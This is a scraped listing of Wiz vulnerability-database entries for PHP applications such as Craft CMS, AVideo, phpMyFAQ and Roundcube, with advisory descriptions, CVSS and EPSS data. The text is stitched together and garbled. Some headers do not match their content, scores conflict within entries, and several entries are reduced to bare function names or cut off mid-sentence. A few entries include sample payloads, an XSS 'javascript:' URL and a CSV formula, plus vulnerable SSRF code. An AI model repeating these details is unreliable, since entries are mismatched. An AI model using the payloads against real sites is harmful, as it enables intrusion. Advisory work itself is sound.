CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.2.0, the application fails to properly sanitize user-controlled input within System Settings – Company Information. Several administrative configuration fields accept attacker-controlled input that is stored server-side and later rendered without proper output encoding. These values are persisted in the database and rendered unsafely on public-facing pages only, such as the main landing page. There is no execution in the administrative dashboard; the vulnerability only impacts the public frontend. This vulnerability is fixed in 0.31.2.0.
Source : NVD
## 7.2
Score
Publ
Wiz
CVE-2026-25489 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-25489 [MEDIUM] CVE-2026-25489 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25489 :
PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored XSS vulnerability in Craft Commerce allows attackers to execute malicious JavaScript in an administrator’s browser. This occurs because the Name & Description fields in Tax Zones are not properly sanitized before being displayed in the admin panel. This issue has been patched in versions 4.10.1 and 5.5.2.
Source : NVD
## 6.1
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.5
Exploitation Probability (EPSS) N/A
Wiz
CVE-2026-32612 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-32612 [MEDIUM] CVE-2026-32612 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32612 :
PHP vulnerability analysis and mitigation
Statamic is a Laravel and Git powered content management system (CMS). Prior to 6.6.2, stored XSS in the control panel color mode preference allows authenticated users with control panel access to inject malicious JavaScript that executes when a higher-privileged user impersonates their account. This has been fixed in 6.6.2.
Source : NVD
Score 5.4
Published March 13, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
statamic/cms
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Mar
## CVE-2026-28501 [CRITICAL], CVSS 9.8: PHP vulnerability analysis and mitigation (Wiz)
WWBN AVideo is an open source video platform. Prior to version 24.0, an unauthenticated SQL Injection vulnerability exists in AVideo within the objects/videos.json.php and objects/video.php components. The application fails to properly sanitize the catName parameter when it is supplied via a JSON-formatted POST request body. Because JSON input is parsed and merged into $_REQUEST after global security checks are executed, the payload bypasses the existing sanitization mechanisms. This issue has been patched in version 24.0.
Source : NVD
Score 9.8
Published March 6, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
## CVE-2026-28805 [HIGH], CVSS 8.8: PHP vulnerability analysis and mitigation (Wiz)
OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, multiple AJAX select handlers in OpenSTAManager are vulnerable to Time-Based Blind SQL Injection through the options[stato] GET parameter. The user-supplied value is read from $superselect['stato'] and concatenated directly into SQL WHERE clauses as a bare expression, without any sanitization, parameterization, or allowlist validation. An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including usernames, password hashes, financial records, and any other information stored in the MySQL database. This issue has been patched in version 2.10.2.
Source : NVD
## CVE-2026-33039 [HIGH], CVSS 8.6: PHP vulnerability analysis and mitigation (Wiz)
WWBN AVideo is an open source video platform. In versions 25.0 and below, the plugin/LiveLinks/proxy.php endpoint validates user-supplied URLs against internal/private networks using isSSRFSafeURL(), but only checks the initial URL. When the initial URL responds with an HTTP redirect (Location header), the redirect target is fetched via fakeBrowser() without re-validation, allowing an attacker to reach internal services (cloud metadata, RFC1918 addresses) through an attacker-controlled redirect. This issue is fixed in version 26.0.
Source : NVD
Score 8.6
Published March 20, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
## CVE-2026-34384 [MEDIUM], CVSS 4.5: PHP vulnerability analysis and mitigation (Wiz)
Admidio is an open-source user management solution. Prior to version 5.0.8, the create_user, assign_member, and assign_user action modes in modules/registration.php approve pending user registrations via GET request without validating a CSRF token. Unlike the delete_user mode in the same file (which correctly validates the token), these three approval actions read their parameters from $_GET and perform irreversible state changes without any protection. An attacker who has submitted a pending registration can extract their own user UUID from the registration confirmation email URL, then trick any user with the rol_approve_users right into visiting a crafted URL that automatically approves the registration. This bypasses the ma
## CVE-2026-2895 [MEDIUM], CVSS 6.3: PHP vulnerability analysis and mitigation (Wiz)
A security flaw has been discovered in funadmin up to 7.1.0-rc4. Affected by this issue is the function repass of the file app/frontend/controller/Member.php. Performing a manipulation of the argument forget_code/vercode results in weak password recovery. Remote exploitation of the attack is possible. The attack's complexity is rated as high. The exploitation is known to be difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
Score 6.3
Published February 21, 2026
Severity MEDIUM
CNA Score 6.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
## CVE-2026-31857 [HIGH], CVSS 8.1: PHP vulnerability analysis and mitigation (Wiz)
Craft is a content management system (CMS). Prior to 5.9.9 and 4.17.4, a Remote Code Execution vulnerability exists in the Craft CMS 5 conditions system. The BaseElementSelectConditionRule::getElementIds() method passes user-controlled string input through renderObjectTemplate() -- an unsandboxed Twig rendering function with escaping disabled. Any authenticated Control Panel user (including non-admin roles such as Author or Editor) can achieve full RCE by sending a crafted condition rule via standard element listing endpoints. This vulnerability requires no admin privileges, no special permissions beyond basic control panel access, and bypasses all production hardening settings (allowAdminChanges: false, devMode: false, enable
## CVE-2023-53929 [MEDIUM], CVSS 6.2: PHP vulnerability analysis and mitigation (Wiz)
phpMyFAQ 3.1.12 contains a CSV injection vulnerability that allows authenticated users to inject malicious formulas into their profile names. Attackers can modify their user profile name with a payload like 'calc|a!z|' to trigger code execution when an administrator exports user data as a CSV file.
Source : NVD
Score 6.2
Published December 17, 2025
Severity MEDIUM
CNA Score 6.2
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 18.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
phpmyfaq/phpmyfaq
thorsten/phpmyfaq
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Jan
## CVE-2025-71177 [MEDIUM], CVSS 5.1: PHP vulnerability analysis and mitigation (Wiz)
LavaLite CMS versions up to and including 10.1.0 contain a stored cross-site scripting vulnerability in the package creation and search functionality. Authenticated users can supply crafted HTML or JavaScript in the package Name or Description fields that is stored and later rendered without proper output encoding in package search results. When other users view search results that include the malicious package, the injected script executes in their browsers, potentially enabling session hijacking, credential theft, and unauthorized actions in the context of the victim.
Source : NVD
Score 5.1
Published January 23, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
PHP
Has Public Exploit Yes
## CVE-2025-14178 [MEDIUM], CVSS 6.5: PHP vulnerability analysis and mitigation (Wiz)
In PHP versions:8.1.* before 8.1.34, 8.2.* before 8.2.30, 8.3.* before 8.3.29, 8.4.* before 8.4.16, 8.5.* before 8.5.1, a heap buffer overflow occurs in array_merge() when the total element count of packed arrays exceeds 32-bit limits or HT_MAX_SIZE, due to an integer overflow in the precomputation of element counts using zend_hash_num_elements(). This may lead to memory corruption or crashes and affect the integrity and availability of the target server.
Source : NVD
Score 8.2
Published December 27, 2025
Severity HIGH
CNA Score 6.5
Affected Technologies
PHP
Rocky Linux
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.9
## GHSA-788v-5pfp-93ff: PHP vulnerability analysis and mitigation (Wiz)
## Impact
ModalFormResponsePacket
## Patches
The issue was fixed in two parts:
cef1088341e40ee7a6fa079bca47a84f3524d877 limits the size of a single form response to 10 KB, which is well above expected size, but low enough to prevent abuse
f983f4f66d5e72d7a07109c8175799ab0ee771d5 avoids decoding the form response if there is no form associated with the given ID
## Workarounds
DataPacketReceiveEvent
formData
Player->forms
## PoC
Join a PocketMine-MP server as a regular player (no special permissions needed).
ModalFormResponsePacket
formId
formData
The server will attempt to parse the JSON and may freeze or become unresponsive. Example NodeJS pseudocode:
```javascript
import { createClient } from 'bedrock-protocol';
```
## CVE-2026-33628 [MEDIUM], CVSS 5.4: PHP vulnerability analysis and mitigation (Wiz)
purify::clean()
Source : NVD
Score 5.4
Published March 26, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
invoiceninja/invoiceninja
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Mar 25, 2026
## CVE-2026-33177 [MEDIUM], CVSS 4.3: PHP vulnerability analysis and mitigation (Wiz)
Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.14 and 6.7.0, low-privileged Control Panel users could create taxonomy terms by submitting requests to the field action processing endpoint with attacker-controlled field definitions. This bypasses the authorization checks enforced on the standard taxonomy term creation endpoint. This has been fixed in 5.73.14 and 6.7.0.
Source : NVD
Score 4.3
Published March 20, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.2
Exploitation Probability (EPSS) N/A
## CVE-2026-34731 [HIGH], CVSS 7.5: PHP vulnerability analysis and mitigation (Wiz)
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo on_publish_done.php endpoint in the Live plugin allows unauthenticated users to terminate any active live stream. The endpoint processes RTMP callback events to mark streams as finished in the database, but performs no authentication or authorization checks before doing so. An attacker can enumerate active stream keys from the unauthenticated stats.json.php endpoint, then send crafted POST requests to on_publish_done.php to terminate any live broadcast. This enables denial-of-service against all live streaming functionality on the platform. At time of publication, there are no publicly available patches.
Source : NVD
Score 7.5
## CVE-2026-31822 [MEDIUM], CVSS 5.3: PHP vulnerability analysis and mitigation (Wiz)
Sylius is an Open Source eCommerce Framework on Symfony. A cross-site scripting (XSS) vulnerability exists in the shop checkout login form handled by the ApiLoginController Stimulus controller. When a login attempt fails, AuthenticationFailureHandler returns a JSON response whose message field is rendered into the DOM using innerHTML, allowing any HTML or JavaScript in that value to be parsed and executed by the browser. The issue is fixed in versions: 2.0.16, 2.1.12, 2.2.3 and above.
Source : NVD
Score 5.3
Published March 10, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
## CVE-2026-24421 [MEDIUM], CVSS 6.5: PHP vulnerability analysis and mitigation (Wiz)
phpMyFAQ is an open source FAQ web application. Versions 4.0.16 and below have flawed authorization logic which exposes the /api/setup/backup endpoint to any authenticated user despite their permissions. SetupController.php uses userIsAuthenticated() but does not verify that the requester has configuration/admin permissions. Non-admin users can trigger a configuration backup and retrieve its path. The endpoint only checks authentication, not authorization, and returns a link to the generated ZIP. This issue is fixed in version 4.0.17.
Source : NVD
Score 6.5
Published January 24, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
## CVE-2026-35450 [MEDIUM], CVSS 5.3: PHP vulnerability analysis and mitigation (Wiz)
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the plugin/API/check.ffmpeg.json.php endpoint probes the FFmpeg remote server configuration and returns connectivity status without any authentication. All sibling FFmpeg management endpoints (kill.ffmpeg.json.php, list.ffmpeg.json.php, ffmpeg.php) require User::isAdmin().
Source : NVD
Score 5.3
Published April 6, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No
## CVE-2026-31859 [MEDIUM], CVSS 6.9: PHP vulnerability analysis and mitigation (Wiz)
Craft is a content management system (CMS). The fix for CVE-2025-35939 in craftcms/cms introduced a strip_tags() call in src/web/User.php to sanitize return URLs before they are stored in the session. However, strip_tags() only removes HTML tags (angle brackets) -- it does not inspect or filter URL schemes. Payloads like javascript:alert(document.cookie) contain no HTML tags and pass through strip_tags() completely unmodified, enabling reflected XSS when the return URL is rendered in an href attribute. This vulnerability is fixed in 5.9.7 and 4.17.3.
Source : NVD
Score 6.9
Published March 11, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Craft CMS
Has Public Exploit No
Has CISA KEV Exploit No
## GHSA-7rhv-h82h-vpjh: PHP vulnerability analysis and mitigation (Wiz)
## Vulnerability Allowing MFA Bypass
## Affected EC-CUBE Versions
Versions: 4.1.0 – 4.3.1
## Vulnerability Overview
If an administrator’s ID and password are compromised, an issue exists that allows an attacker to bypass the normally required two-factor authentication (2FA) and log in to the administrative interface.
## Severity and Impact
CVSS v3.1 score
Base score: 6.2 / Temporal score: 5.7 / Environmental score (after mitigation and countermeasures): 0.0
An attacker can forcibly overwrite the 2FA configuration of an account with administrative privileges. As a result, the legitimate administrator can be locked out, while the attacker can log in to the administrative interface and perform unauthorized action
## CVE-2025-66844 [CRITICAL], CVSS 9.1: PHP vulnerability analysis and mitigation (Wiz)
In grav <1.7.49.5, a SSRF (Server-Side Request Forgery) vector may be triggered via Twig templates when page content is processed by Twig and the configuration allows undefined PHP functions to be registered
Source : NVD
Score 9.1
Published December 15, 2025
Severity CRITICAL
CNA Score 9.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
getgrav/grav
Sources
NVD
Composer Severity CRITICAL No Fix Added at: Dec 18, 2025
## CVE-2026-33159 [MEDIUM], CVSS 6.9: PHP vulnerability analysis and mitigation (Wiz)
Craft CMS is a content management system (CMS). From version 4.0.0-RC1 to before version 4.17.8 and from version 5.0.0-RC1 to before version 5.9.14, guest users can access Config Sync updater index, obtain signed data, and execute state-changing Config Sync actions (regenerate-yaml, apply-yaml-changes) without authentication. This issue has been patched in versions 4.17.8 and 5.9.14.
Source : NVD
Score 6.9
Published March 24, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Craft CMS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24.4
Exploitation Probability (EPSS) 0.1
## CVE-2026-34369 [MEDIUM], CVSS 5.3: PHP vulnerability analysis and mitigation (Wiz)
get_api_video_file
get_api_video
CustomizeUser::getModeYouTube()
Source : NVD
Score 5.3
Published March 27, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 19.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 31, 2026
## CVE-2025-56421 [HIGH], CVSS 7.5: PHP vulnerability analysis and mitigation (Wiz)
SQL Injection vulnerability in LimeSurvey before v.6.15.4+250710 allows a remote attacker to obtain sensitive information from the database.
Source : NVD
Score 7.5
Published March 10, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
limesurvey/limesurvey
limesurvey
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 12, 2026
Nix Severity HIGH No Fix Added at: Mar 22, 2026
## GHSA-r33w-fg8j-9c94 [MEDIUM], CVSS 5.3: PHP vulnerability analysis and mitigation (Wiz)
## Description
magic_links.action
## Resolution
ActionAbstract
allowed_classes
unserialize()
Source : NVD
Score 8.8
Published February 12, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cesargb/laravel-magiclink
Sources
NVD
Composer Severity HIGH Has Fix Added at: Feb 15, 2026
## CVE-2026-34613 [MEDIUM], CVSS 6.5: PHP vulnerability analysis and mitigation (Wiz)
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo endpoint objects/pluginSwitch.json.php allows administrators to enable or disable any installed plugin. The endpoint checks for an active admin session but does not validate a CSRF token. Additionally, the plugins database table is explicitly listed in ignoreTableSecurityCheck(), which means the ORM-level Referer/Origin domain validation in ObjectYPT::save() is also bypassed. Combined with SameSite=None on session cookies, an attacker can disable critical security plugins (such as LoginControl for 2FA, subscription enforcement, or access control plugins) by luring an admin to a malicious page. At time of publication, there are no publicly avai
## CVE-2026-26045 [HIGH], CVSS 7.2: PHP vulnerability analysis and mitigation (Wiz)
A flaw was identified in Moodle’s backup restore functionality where specially crafted backup files were not properly validated during processing. If a malicious backup file is restored, it could lead to unintended execution of server-side code. Since restore capabilities are typically available to privileged users, exploitation requires authenticated access. Successful exploitation could result in full compromise of the Moodle server.
Source : NVD
Score 7.2
Published February 21, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 28
## CVE-2026-32299 [HIGH], CVSS 7.5: PHP vulnerability analysis and mitigation (Wiz)
Connect-CMS is a content management system. In versions on the 1.x series up to and including 1.41.0 and versions on the 2.x series up to and including 2.41.0, an improper authorization issue in the page content retrieval feature may allow retrieval of non-public information. Versions 1.41.1 and 2.41.1 contain a patch.
Source : NVD
Score 7.5
Published March 23, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
opensource-workshop/connect-cms
Sources
NVD
Composer Severity HIGH Has Fix Adde
## CVE-2026-34036 [MEDIUM], CVSS 6.5: PHP vulnerability analysis and mitigation (Wiz)
Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. In versions 22.0.4 and prior, there is a Local File Inclusion (LFI) vulnerability in the core AJAX endpoint /core/ajax/selectobject.php. By manipulating the objectdesc parameter and exploiting a fail-open logic flaw in the core access control function restrictedArea(), an authenticated user with no specific privileges can read the contents of arbitrary non-PHP files on the server (such as .env, .htaccess, configuration backups, or logs…). At time of publication, there are no publicly available patches.
Source : NVD
Score 6.5
Published March 31, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
## CVE-2025-69200 [HIGH], CVSS 7.5: PHP vulnerability analysis and mitigation (Wiz)
POST /api/setup/backup
database.php
Source : NVD
Score 7.5
Published December 29, 2025
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 88.7
Exploitation Probability (EPSS) 4.2
Affected packages and libraries
thorsten/phpmyfaq
Sources
NVD
Composer Severity HIGH Has Fix Added at: Dec 31, 2025
## GHSA-wxjx-r2j2-96fx: PHP vulnerability analysis and mitigation (Wiz)
## Summary
plugin/Live/test.php
statsURL
file_get_contents()
curl_exec()
wget
/^http/
isSSRFSafeURL()
## Details
`plugin/Live/test.php`:
```php
$statsURL = $_REQUEST['statsURL'];
if (empty($statsURL) || $statsURL == "php://input" || !preg_match("/^http/", $statsURL)) {
    _log('this is not a URL ');
    exit;
}
```
`/^http/`
```php
if (ini_get('allow_url_fopen')) {
    try {
        $tmp = file_get_contents($url, false, $context);
        _log('file_get_contents:: '.htmlentities($tmp));
```
Sink: curl_exec (lines 73-94):
```php
} elseif (function_exists('curl_init')) {
    $ch = curl_init();
    // ...
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    // ...
    $output = curl_exec($ch);
    // ...
    _log('curl_init:: '.htmlentities($output));
```
## CVE-2026-33651 [HIGH], CVSS 8.1: PHP vulnerability analysis and mitigation (Wiz)
remindMe.json.php
$_REQUEST['live_schedule_id']
Scheduler_commands::getAllActiveOrToRepeat()
LIKE
new Live_schedule()
getUsers_idOrCompany()
intval()
ObjectYPT::getFromDb()
Source : NVD
Score 8.8
Published March 23, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 26, 2026
## CVE-2026-2896 [MEDIUM], CVSS 6.9: PHP vulnerability analysis and mitigation (Wiz)
A weakness has been identified in funadmin up to 7.1.0-rc4. This affects the function setConfig of the file app/backend/controller/Ajax.php of the component Configuration Handler. Executing a manipulation can lead to improper authorization. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
Score 6.9
Published February 22, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.3
## CVE-2026-32264 [HIGH], CVSS 8.6: PHP vulnerability analysis and mitigation (Wiz)
Craft CMS is a content management system (CMS). From version 4.0.0-RC1 to before version 4.17.5 and from version 5.0.0-RC1 to before version 5.9.11, there is a Behavior injection RCE vulnerability in ElementIndexesController and FieldsController. Craft control panel administrator permissions and allowAdminChanges must be enabled for this to work. This issue has been patched in versions 4.17.5 and 5.9.11.
Source : NVD
Score 8.6
Published March 16, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Craft CMS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.9
Exploitation Probability (EPSS) N/A
## CVE-2026-23494 [MEDIUM], CVSS 4.3: PHP vulnerability analysis and mitigation (Wiz)
Pimcore is an Open Source Data & Experience Management Platform. Prior to 12.3.1 and 11.5.14, the application fails to enforce proper server-side authorization checks on the API endpoint responsible for reading or listing static routes. In Pimcore, static routes are custom URL patterns defined via the backend interface or the var/config/staticroutes.php file, including details like regex-based patterns, controllers, variables, and priorities. These routes are registered automatically through the PimcoreStaticRoutesBundle and integrated into the MVC routing system. Testing revealed that an authenticated backend user lacking explicit permissions was able to invoke the endpoint (e.g., GET /api/static-routes) and retrieve sensitiv
Wiz
CVE-2026-35540 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 5.3 · MEDIUM
## CVE-2026-35540: PHP vulnerability analysis and mitigation
An issue was discovered in Roundcube Webmail 1.6.0 before 1.6.14. Insufficient Cascading Style Sheets (CSS) sanitization in HTML e-mail messages may lead to SSRF or Information Disclosure, e.g., if stylesheet links point to local network hosts.
Source: NVD
Score 5.4
Published April 3, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
roundcube
roundcube/roundcubemail
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Apr 05, 2026
Echo Severity MEDIUM Has
Wiz
CVE-2026-33650 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 7.6 · HIGH
## CVE-2026-33650: PHP vulnerability analysis and mitigation
Permissions::canModerateVideos()
videoAddNew.json.php
videoDelete.json.php
Source: NVD
Score 7.6
Published March 23, 2026
Severity HIGH
CNA Score 7.6
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 26, 2026
Wiz
CVE-2025-70958 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 6.1 · MEDIUM
## CVE-2025-70958: PHP vulnerability analysis and mitigation
Multiple reflected cross-site scripting (XSS) vulnerabilities in the installation module of Subrion CMS v4.2.1 allow attackers to execute arbitrary JavaScript in the context of the user's browser by injecting a crafted payload into the dbuser, dbpwd, and dbname parameters.
Source: NVD
Score 6.1
Published February 2, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
intelliants/subrion
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Feb 04, 2026
Wiz
CVE-2026-34557 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 9.1 · CRITICAL
## CVE-2026-34557: PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within group and role management functionality. Multiple input fields (three distinct group-related fields) can be injected with malicious JavaScript payloads, which are then stored server-side. These stored payloads are later rendered unsafely within privileged administrative views without proper output encoding, leading to stored cross-site scripting (XSS) within the role and permission management context. This issue has been patched in version 0.31.0.0.
Source: NVD
Score 9
Wiz
CVE-2026-34395 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 6.5 · MEDIUM
## CVE-2026-34395: PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the plugin/YPTWallet/view/users.json.php endpoint returns all platform users with their personal information and wallet balances to any authenticated user. The endpoint checks User::isLogged() but does not check User::isAdmin(), so any registered user can dump the full user database. At time of publication, there are no publicly available patches.
Source: NVD
Score 6.5
Published March 31, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.6
Exploitation Probability (EPSS) N/A
Wiz
CVE-2025-14761 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 6.0 · MEDIUM
## CVE-2025-14761: PHP vulnerability analysis and mitigation
Missing cryptographic key commitment in the AWS SDK for PHP may allow a user with write access to the S3 bucket to introduce a new EDK that decrypts to different plaintext when the encrypted data key is stored in an "instruction file" instead of S3's metadata record.
To mitigate this issue, upgrade AWS SDK for PHP to version 3.368.0 or later
Source: NVD
Score 6
Published December 17, 2025
Severity MEDIUM
CNA Score 6.0
Affected Technologies
PHP
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
nextcloud-server-31
nextcloud-server-32
Sources
Wiz
CVE-2026-35542 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 5.3 · MEDIUM
## CVE-2026-35542: PHP vulnerability analysis and mitigation
An issue was discovered in Roundcube Webmail before 1.5.14 and 1.6.14. The remote image blocking feature can be bypassed via a crafted background attribute of a BODY element in an e-mail message. This may lead to information disclosure or access-control bypass.
Source: NVD
Score 5.3
Published April 3, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
roundcube/roundcubemail
roundcube
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Apr 05, 2026
Wiz
CVE-2026-33294 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 5.0 · MEDIUM
## CVE-2026-33294: PHP vulnerability analysis and mitigation
plugin/BulkEmbed/save.json.php
url_get_contents()
isSSRFSafeURL()
Source: NVD
Score 4.3
Published March 22, 2026
Severity MEDIUM
CNA Score 5.0
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 20, 2026
Wiz
CVE-2026-28695 Impact, Exploitability, and Mitigation Steps | Wiz
